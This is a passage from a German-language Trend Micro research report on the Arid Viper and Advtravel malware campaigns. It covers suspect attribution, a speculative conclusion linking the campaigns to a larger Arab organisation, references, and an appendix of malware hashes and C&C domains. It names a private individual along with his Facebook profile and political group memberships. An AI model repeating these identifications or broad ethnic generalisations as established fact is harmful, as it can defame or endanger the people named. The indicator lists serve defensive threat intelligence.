entdeckten wir einen Kommentar von einem Mohamed Khaled zu
diesem Remote-Access-Tool (RAT).
Fathy Mostafa
Abschnitt aus .TXT-Datei
http://www/hackerbox.net/
upload.txt,der eine Beziehung
zwischen Dev_hima und
ViRuS_HiMa zeigt
Fathy Mostafa ist eine weitere Person mit offensichtlichen Verbindungen zur
Operation Advtravel. In einem der Protokolle von advtravel.info stießen wir auf
einen Screenshot der Advtravel-Haupt-Malware während der Entwicklungsphase.
Der Code zeigte das Testen von URLs, die dieselben Pfade wie die eigentliche
Malware nutzten, die auf die Domain advtravel.info zugriff. Der Benutzername fathy
ist deutlich zu erkennen. Andere Protokolle von derselben Infektion lieferten uns
einige Details über gestohlene Konten. Beispiele:
•
http://members.000webhost.com/login.php wurde unter Verwendung von
[email protected] und [email protected] registriert
•
https://khamsat.com/register, https://www.freelancer.com/ und
https://‌www.‌linkedin.com/uas/login verwendeten [email protected]
Laut Tätigkeitsprofil in beruflichen Netzwerken verfügt Mostafa über Kenntnisse in der
C#-Programmierung. Zufällig wurde diese Programmiersprache auch zur Entwicklung
der Advtravel-Malware verwendet.
25 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Facebook-Profil und -Bild von Mohammed Khaled
Die E-Mail-Adresse
[email protected] war
auch mit dem Facebook-Konto
https://www.facebook.com/fathy.
mostafa.1690 verbunden. Das
Profil deutet darauf hin, dass
Mostafa in Ägypten lebt – wie
viele andere Personen, die mit der
Operation Advtravel in Verbindung
stehen. Er studierte Elektrotechnik
und ist Mitglied verschiedener
Facebook-Gruppen, von denen
zwei mit der Muslimbruderschaft
zusammenhängen. [8]
Kommentar von Khaled zum RAT von Dev_hima
Weitere Personen
Zusätzlich zu den bisher
erwähnten Personen wurden
weitere Nicknamen in Verbindung
mit der Operation Advtravel
gefunden. In der AdvtravelSystemsteuerung entdeckten
wir drei weitere Kontonamen:
khodla, belal und belal2.
Die Systeme mit Eigentümer
Advtravel.info-Protokoll mit dem Malware-Code während
„belal“ hatten besondere
der Entwicklungsphase
Verbindungen zur Operation
Advtravel, da sie in den Benutzer­
namen das Wort „Roo0T“ oder „Ro0t“ verwendeten. Alle seine Systeme verfügten
über die Systemsteuerung der Haupt-Malware, zusammen mit Spielen wie „Counter
Strike Global Offensive“. Darüber hinaus verfügte er über Ordner mit njrat7-Malware.
Dieses RAT wurde in Arabien entwickelt und wird dort unterstützt. Die Malware
ist damit besonders in arabischen Ländern sehr verbreitet. Die Ordner von Belal
beinhalteten außerdem die .TXT-Datei Israil mails.txt mit 2.572 E-Mail-Adressen –
wahrscheinlich als mögliche Angriffsziele.
26 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Facebook-Profil von Mostafa
Anmeldung von Belal an Advtravel-Systemsteuerung
27 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zum Betrug mit der gefälschten Banking-App in Südkrea
FAZIT
Die in diesem Bericht beschriebenen MalwareKampagnen „Operation Arid Viper“ und „Operation
Advtravel“ sind separate, aber dennoch eng
miteinander verknüpfte Kampagnen. Operation
Arid Viper richtet sich gezielt gegen israelische
Unternehmen und Organisationen, einschließlich
einiger bekannter Opfer. Die Kampagne nutzt eine
Netzwerk­infrastruktur in Deutschland und zeichnet
sich durch verschiedene enge Beziehungen zu Gaza
in Palästina aus.
Advtravel dagegen steht mehr im Zusammenhang mit
Ägypten, sowohl von Seiten der Täter als auch der
Opfer. Basierend auf registrierten IP-Adressen konnten
wir jedoch auch hier Verbindungen zum Gazastreifen
erkennen.
Obwohl die zwei Kampagnen dieselbe Infrastruktur
nutzten, unterschieden sie sich deutlich in der jeweils
verwendeten Taktik voneinander. Operation Arid
Viper ist eine raffinierte Kampagne, die sich gegen
hochrangige Personen in Unternehmen richtet, um
vertrauliche Daten zu entwenden. Die C&C-Server
dieser Kampagne waren sehr gut vor öffentlichem
Zugriff geschützt und boten nur äußerst spärliche
Ermittlungshinweise.
Im Gegensatz dazu scheint Advtravel das Werk
wenig erfahrener Cyberkrimineller zu sein, deren
Motive offensichtlich weder finanzielle Gewinne noch
Spionage sind. Diese Angreifer wirken eher wie eine
Gruppe unerfahrener Anfängerhacker.
Dennoch muss interessanterweise angemerkt werden,
dass die Operationen Arid Viper und Advtravel
neben der gemeinsamen arabischen Herkunft
weitere Verbindungen aufweisen. Wir können nicht
mit Sicherheit feststellen, ob die Hintermänner der
Kampagnen als separate Gruppen oder Einzel­
personen arbeiten. Wir vermuten jedoch, dass
sie Teil einer größeren Organisation sind. Es gibt
verschiedene Organisationen, die sowohl mit Gaza
als auch mit Ägypten in Verbindung stehen, wie die
Muslim­bruderschaft – eine transnationale islamistische
Organisation, die 1928 in Ägypten gegründet wurde.
Die Bruderschaft wurde 2011 in Ägypten legalisiert
und gewann die Parlamentswahlen, bevor es 2013
durch einen Militärputsch zum Sturz der Regierung
kam. Im Jahr 1987 bildeten einige mit der Bruderschaft
verbundene Hilfsorganisationen die islamistische
ii
Widerstands­bewegung, besser bekannt als „Hamas“ –
eine berüchtigte palästinensische Terrororganisation,
die seit ca. 2007 die Kontrolle über den Gazastreifen
ausübt.
Wer auch immer die wirklichen Täter sein mögen, sie
sind Teil der arabischen Welt – und damit der Beleg
für eine aufkommende Generation von arabischen
Hackern und Malware-Entwicklern, die ihre erklärten
Feinde fest entschlossen ins Visier nehmen. Einige
dieser Black-Hats, ob Söldner oder Cybersoldaten,
richten ihre Angriffe aus politischer Überzeugung
gezielt gegen Länder wie Israel. Wir konnten einen
umfassenden Einblick in einen Cyber-Guerillakrieg
gewinnen, der – von IT-Sicherheitsmedien allgemein
unbeachtet – im Cyber-Untergrund geführt wird.
Besonders interessant waren hierbei unsere
Erkenntnisse, dass hinter den zwei spezifischen
Kampagnen unterschiedliche arabische Gruppen
standen, die dieselbe Netzwerkinfrastruktur zur
Ausführung und Überwachung ihrer Angriffe nutzten.
Hierfür gibt es zwei mögliche Erklärungen: Entweder
gab es zwischen den Angriffen einen näheren
Zusammen­hang, was aufgrund der unterschiedlichen
Taktiken und Motive eher unwahrscheinlich erscheint –
oder eine übergeordnete Organisation unterstützt
verschiedene arabische Gruppen bei der Ausführung
von Cyber-Gewaltakten. Diese Annahme scheint eher
wahrscheinlich zu sein.
Sollte sich unsere Theorie bewahrheiten, werden
wir in naher Zukunft zahlreiche Cyber-Angriffe mit
schwerwiegenden Folgen erleben, die von arabischen
Ländern ausgehen. Internetnutzer werden sich
ungewollt mitten auf einem Schlachtfeld wiederfinden,
das für sie nicht von großem Interesse ist.
Zum jetzigen Zeitpunkt können wir leider nur gut
informierte Schlussfolgerungen und Zuordnungs­
hinweise bieten. Eines ist jedoch klar: Unabhängig
davon, ob es sich nun um eine technisch anspruchs­
volle und verborgene Malware oder um eine eher
einfache und von Anfängern entwickelte Schad­
software handelt – beide hatten verheerende Folgen
für die jeweiligen Opfer. Trend Micro wird daher stets
weiter das Ziel verfolgen, derartige Bedrohungen
aufzudecken, um unsere digitale Welt zu schützen und
einen sicheren Austausch von Daten zu ermöglichen.
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
LITERATUR­
HINWEISE
[1]
The Week Ltd. (1. August 2014). The Week. „Iron Dome:
How Israel’s Missile Defence System Works.” Letzter Zugriff am
12. Februar 2015, http://www.theweek.co.uk/world-news/middleeast/59368/iron-dome-how-israels-missile-defence-system-works.
[2]
BBC. (20. Dezember 2014). BBC. „Israel Launches Gaza Air Strike
on ‘Hamas Target.’“ Letzter Zugriff am 12. Februar 2015,
http://‌www.bbc.com/news/world-middle-east-30558922.
[3]
Pierluigi Paganini. (16. Dezember 2012). The Hacker News. „Yahoo
Data Leak by ViRuS_HiMa, Why Do We Need Proactive Security?“
Letzter Zugriff am 12. Februar 2015, http://thehackernews.com/
2012/12/yahoo-data-leak-by-virushima-why-do-we.html.
[4]
Pierluigi Paganini. (15. März 2013). Security Affairs.
„XSS Vulnerability in 2shared.com reported by ViRuS_HiMa.“
Letzter Zugriff am 12. Februar 2015, http://securityaffairs.co/
wordpress/12889/hacking/xss-vulnerability-in-2shared-comreported-by-virus_hima.html.
[5]
Gast. (15. Dezember 2012). Pastebin. „Yahoo Data Leak by
ViRuS_HiMa.” Letzter Zugriff am 12. Februar 2015,
http://‌pastebin.‌com/Pxnszw7b.
[6]
Wikimedia Foundation Inc. (8. Februar 2015). Wikipedia.
„Muslim Brotherhood.“ Letzter Zugriff am 12. Februar 2015,
http://‌en.‌wikipedia.org/wiki/Muslim_Brotherhood.
iii | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
ANHANG
Dieser Abschnitt listet alle SHA256-Hashes im Zusammenhang mit den Operationen Arid Viper und Advtravel
sowie die entsprechenden Malware-Namen auf, die von Trend Micro vergeben wurden.
SHA-256-Hashes
Von Trend Micro erkannt als
advtravel.info
015fbc0b216d197136df8692b354bf2fc7bd6eb243e73283d861a4dbbb81a751
TROJ_STRPADT.A
17f2eb260f0b6942f80453b30f1a13235f27b7ed80d4e5815fb58ff7322fc765
TROJ_STRPADT.A
32e2b9cc92dfc1e77a85adb6a8b13c9b6264b7adb286260bd8bf6e47b6cde255
TROJ_STRPADT.A
4a581d9636a4f00a880b07f6dca1a82a866cf5713c74e722cfa9f71e08c33643
TROJ_STRPADT.A
69589b1691909fa091a901f7323515228594561bc18032f8ffde095993333ecc
TROJ_STRPADT.A
6cc4869f1991df5879d0c4fc002f996a56bf11624d79ea2d34b52ceb98516425
TROJ_STRPADT.A
72be7e8903211e37bb3a4b04d7684d49ed8fb21ec3fdf6367e4eed2aa6fdc54c
TROJ_STRPADT.A
856580576be62a0b14a01e9973b2fcb0c344e680b70a3b08b4ea293f84b47a59
TROJ_STRPADT.A
8c4867a434e0b279c3f7fc5baedb04753c41a79cc52da6e3148c110d82a588e8
TROJ_STRPADT.A
ae38be6e54447ddf5a9f16748a749ab0c9c7524f7f4f9878e3b4940415970a19
TROJ_STRPADT.A
ea94498aeeef4535ea1c876a0f7317d6049307c82f9396dc6b9e3542a6aa50a3
TROJ_STRPADT.A
ahmedfaiez.info
2a375d2a9c41af31554bafb4a712097cc016d5227cb1f07652f0ef3483d5be30
TROJ_STRPSPI.A
55cee457c73aa87258a04562c9d04cd3c865608d5dd64366d9cd9bc2fe2f5dd9
TROJ_STRPSPI.A
a4cebac7bf4e5faa537a6013e9ae19c683d7cdad9dd318fdd968a966dd3a3010
TROJ_STRPSPI.A
iv | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
SHA-256-Hashes
Von Trend Micro erkannt als
cb3039dad0ebd63e40fbcdbb8a2a1cdf9f442b2870383f5d469765387d0c8ec0
TROJ_STRPSPI.A
d4cb58f6167b72764a216d0ce6281d2251f02a696060eb425c9782283422a828
TROJ_STRPSPI.A
flushupate.com
91d3a9c6de14197fe3be7c2b86b88b58b1f731d3e82bb0b7b11d5c75fbbed9a5
TROJ_STRPSPI.B
b6ca1211159e9fd790790e49db5eb1b7a11c09f746d3135ae7a67ce8f518a403
TROJ_STRPSPI.B
e18f051ac27ed29f792db49e4333adca9b1762d485a9214b5af12ffe858ca3fc
TROJ_STRPSPI.B
flushupdate.com
381bcf2b7fefcdade08bb6a02dc32ea535dbef9cb9a43220649916db8bcc39d8
TROJ_STRPSPI.C
502953496a40661bb6336a693371d3dd29ad96feb5e9f91a5b5ca0ad3ffbf29f
TROJ_STRPSPI.C
52767ea5e20b8639433c087edf86ef91b0cb7fda46c71dcce625938a9f5d8a74
TROJ_STRPSPI.C
4436c7024366356cd04724e1d6867786f2587a6f6295fc74b3af0c02a257adba
TROJ_STRPSPI.D
4619cec6310e16d30e05204b35c084aabafabdd3d3f87661774fec253a103d11
TROJ_STRPSPI.D
8eeab6635982618bebc137cf6c4795aa10010685d9c7bb6ce66932215195eed7
TROJ_STRPSPI.C
92cd7309723461918b9cd2988a26cd2199749e82636dc6628a46878db7e12db3
TROJ_STRPSPI.D
940a3ed18c4f171c9a6bccc0ab0ee8075aad6da8023e0b0e8883ca56bdddb4c7
TROJ_STRPSPI.C
a348aabfd8aeec855933509c4c0b2aee78408ada89d8b51ce16b2247659b22f7
TROJ_STRPSPI.C
ae35a7a1b084d09bb913b450944dc6f3205650298e58d19e3e2ee4db93a109ea
TROJ_STRPSPI.C
b5ba8fbc4f5c9bbf01c9a0a533ecab0735bf8e5e63116fffc570392e6faa9d18
TROJ_STRPSPI.C
b7666d4a0afe5f5b5de8faa541be31bbe34ea51c3b3a3fab77937f816ac6181e
TROJ_STRPSPI.C
bbacf000880a46c7955a27f5dd960a6e253cd357f14f97f8472dd4fc3032f44d
TROJ_STRPSPI.C
bda7ea39f9105c25250f14e9e1fa3de0f51b91b04349974c7cadbbbe1c06ce2f
TROJ_STRPSPI.C
v | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
SHA-256-Hashes
Von Trend Micro erkannt als
ineltdriver.com
d2ccf6fa361ceaf8cebada53bb1f9458b016ad85b74a7dc1bf4ba18774d92645
TROJ_STRPSPI.C
e7b59b841e127c6fe6e02dd98292bba49bd32350b57595e09a6adab8da78235b
TROJ_STRPSPI.C
e810c74aefd63ce4ea674a1a961075a4d86a10b802d365b6b2b98a724d9b86db
TROJ_STRPSPI.D
f467c72fa8adde6ddf27150122c117a17d1d664876c2f9d87e68e06257eb1904
TROJ_STRPSPI.C
linksis.info
58b48fd39ef718e5bd501f57e83b537668b13176ca682aee36402d18bd0c0733
TROJ_STRPADT.B
59d880ae82ccc3c8207b745b1b3e55119a5b62af086a1639270b1ba5b7e1893a
TROJ_STRPADT.B
74d3093a51482a1eaa15e4fc8aa4b7d659d571db0570950272d7aa998aec6f49
TROJ_STRPADT.B
829b90bcf24fdf7f0298edec701c3c45b820f297dd012ac22e27e4bd295ee5f2
TROJ_STRPADT.B
9b6595980751537adf627e6107c08537de13e39752ed54c73e2b6af23e2a2769
TROJ_STRPADT.B
d711dc3c75a60ca0cd2556c267e3c33cee5d677edcfe70fb88b334f08f81ece9
TROJ_STRPADT.B
e850650e6982469529768988dfabadfdaa53b25abe1e0c0f0b3894b31a83b061
TROJ_STRPADT.B
mediahitech.info
db06c1914c82b52c9f2ee6ddffb13acde22d2227d626c41c35c163266b11d29c
TROJ_STRPSPI.F
mixedwork.com
177d9e42c4e2dfc3641cdc1f92815600c861501f5c880f5ab9cb642feb9b94bd
TROJ_STRPSPI.F
390ef820779cd7461792f0aa4fc324cb06e1226e551a158cb87ca4db05358ef3
TROJ_STRPSPI.F
3fbdfcf1eae14daa7b2fa6b7d3fa7cf602cd6ff178483c9019e3bb0aa2bb902c
TROJ_STRPSPI.F
62b10dc88df96e2d3d9cf5521a8d8372d6228fc82587bdee7f0de3c1c1d5a8bd
TROJ_STRPSPI.F
6e8287bb8909baa65e5c00b853b4f66844e5cf3d7a5f8b707997c02395b93505
TROJ_STRPSPI.F
vi | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
SHA-256-Hashes
Von Trend Micro erkannt als
8c66812d657027f537aa43f406182ba39e9baf3785f067ade003f96397b11ec0
TROJ_STRPSPI.F
a1bf0e5277f6fc962be778f182971eb4911d9c97cf27526d9e5698d514cef3c0
TROJ_STRPSPI.F
a6eac7a3607713fbeb3b50d227f3742ea23aa21c50eeff8987bbba10138527a9
TROJ_STRPSPI.F
b33472608ce524c2750b70c496a696ad6653b8a6ea7b474445d94cd491d255cf
TROJ_STRPSPI.F
bcc1a294bc63c3fa873f364bab0a7aa368d85726346106422013c270d55fec3c
TROJ_STRPSPI.F
bd9ab35587fdb450242b7a9ee0298c04dbd2fb254065fa004cda1ad42ac5f338
TROJ_STRPSPI.E
e29647c7719696bf9d4d5aa8c8f10152b5b63b6d25969db90d9634273c0353f8
TROJ_STRPSPI.F
pstcmedia.com
05eb2ecfc731ce222ebe82f6b3428fc5aa4179f7be5f328c5447317950e2d0e7
TROJ_STRPSPI.G
0d22606d24911c2128651ba0421c7c5bf7cd3eedef871c460b02b42b2417c457
TROJ_STRPSPI.G
11768a3a63458963d1d31be5c94d716b8e4f75dc1593080c2988b22cb6facaa8
TROJ_STRPSPI.G
21b9b34d4a21ee538e7908727aca5d367f8d400db920187f51be2921a696421f
TROJ_STRPSPI.G
2bd901a246f0b0b90ba891ee37c2ee4f7bd30d36d307b151998769fcc23fd1cb
TROJ_STRPSPI.G
33fc87cc53eb867dc89e34fe7a46d33d90cab02f84299531d2e677a507ed308c
TROJ_STRPSPI.G
62f9839190e2fe50439894c667b3cbe29d64c3808cc471745e3d33b61370a340
TROJ_STRPSPI.G
694c01c9ade6258596cfafa6247da71712b2c3273bfc25ad26cb47302b8bbf4d
TROJ_STRPSPI.G
74f22eced680ca26b767b4b07ba26b98536a385249d751586915b15b56509e0d
TROJ_STRPSPI.G
81cc84f29a4c444724cbbfab83185866ecebc68c9c0a37f9623a4954456c4dd1
TROJ_STRPSPI.G
a185dca4bd3b08bdafa80d53eec7ba792fb94b83785210049ba85477ce7c8cda
TROJ_STRPSPI.G
a36e2b88b2440aff13bf0473a19e4cd7b7d19e8bc96bb2fd10b991c33e18be7c
TROJ_STRPSPI.G
aab2cf709d095d949f662c40e9f889a8f3efa130102fc571f56a84205fdc67cb
TROJ_STRPSPI.G
vii | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
SHA-256-Hashes
Von Trend Micro erkannt als
b009a87d8de4fae3395a06b2676c483a80b10ca12c5bbc093aa71ea504a77dc7
TROJ_STRPSPI.G
bb3eefa723221e2aa27c4f56f61418319ccda41b70e9e4b0375bf3bb131e974b
TROJ_STRPSPI.G
d09a773dab9a20e6b39176e9cf76ac6863fe388d69367407c317c71652c84b9e
TROJ_STRPSPI.G
dad8cf7474c71db1512e637db780f4650d30b040903d7a76840a1c099b9b8650
TROJ_STRPSPI.G
e91216df556bee622e4eab8551fe534cda8f2f1056b8d8442f088a4035815dfe
TROJ_STRPSPI.G
plmedgroup.com
09be9911eedb9b01d8f544252fb0c74f2dadcf850f33a0b947eac740de8c2427
viii | Seite
TROJ_STRPSPI.H
© 2015 Trend Micro Incorporated
Als weltweit führender Anbieter von Sicherheitssoftware hat Trend Micro Incorporated das
Ziel, eine sichere Welt für den digitalen Datenaustausch zu schaffen. Unsere innovativen
Lösungen für Privatanwender, Unternehmen und Behörden bieten mehrschichtigen
Schutz für digitale Inhalte, um Daten auf Mobilgeräten, Endpunkten, Servern, an
Gateways sowie in der Cloud zu schützen. Alle Lösungen werden durch cloudbasierte
Bedrohungsinformationen des Trend Micro™ Smart Protection Network™ sowie mehr als
1.200 Bedrohungsexperten weltweit unterstützt. Weitere Informationen erhalten Sie unter
www.trendmicro.com.
©2015 Trend Micro, Incorporated. Alle Rechte vorbehalten. Trend Micro und das Trend
Micro T-Ball-Logo sind Marken oder eingetragene Marken von Trend Micro Incorporated.
Alle anderen Firmen- oder Produktnamen sind Marken oder eingetragene Marken ihrer
jeweiligen Eigentümer.
TREND MICRO Deutschland
GmbH
Central & Eastern Europe
Zeppelinstraße 1
85399 Hallbergmoos
Tel: +49 (0) 811 88990-700
Fax: +49 (0) 811 88990-799
TREND MICRO (Schweiz) GmbH
Schaffhauserstrasse 104
CH-8152 Glattbrugg
Tel: +41 43 233 77 81
Fax: +41 43 233 77 83
www.trendmicro.com